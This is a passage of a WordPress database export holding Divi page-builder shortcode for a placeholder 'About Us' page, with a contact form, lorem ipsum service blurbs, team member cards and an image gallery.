custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','publish','closed','closed','','about-us','','','2021-03-22 12:02:49','2021-03-22 12:02:49','',0,'https://wthtest1.in8.cdn-alpha.com/?page_id=392',0,'page','',0),(393,1,'2020-08-04 18:53:00','2020-08-04 18:53:00','<!-- wp:divi/placeholder /-->','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 18:53:00','2020-08-04 18:53:00','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(394,1,'2020-08-04 18:54:58','2020-08-04 18:54:58','','WHY WE','','publish','closed','closed','','394','','','2020-08-18 10:57:22','2020-08-18 10:57:22','',0,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/394/',1,'nav_menu_item','',0),(395,1,'2020-08-04 18:54:58','2020-08-04 18:54:58','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#fcd21d\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#fcd21d\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" 